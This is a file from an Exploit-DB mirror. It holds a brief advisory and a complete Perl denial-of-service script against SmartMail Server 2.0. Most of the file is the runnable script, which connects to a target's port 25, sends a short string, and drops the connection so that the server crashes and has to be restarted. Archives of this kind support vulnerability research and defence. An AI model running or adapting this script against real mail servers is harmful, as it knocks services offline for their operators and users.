exploit-db-mirror/exploits/windows/dos/21972.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

38 lines
No EOL
1 KiB
Perl
Executable file

source: https://www.securityfocus.com/bid/6074/info
SmartMail Server is reported to be prone to a denial of service when a client is sending data and then closes the connection unexpectedly.
SmartMail Server will need to be restarted to regain normal functionality.
This issue was reported in SmartMail Server 2.0 Interim Build 83. It is not known if other versions are affected.
#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma@caramail.com
use Socket;
if (not $ARGV[0]) {
print qq~
Usage: sm.pl <host>
~;
exit;}
$ip=$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,25,$target)){
select(S);
$|=1;
print $pstr;
sleep 3;
close(S);
} else { die("Can't connect...\n"); }
}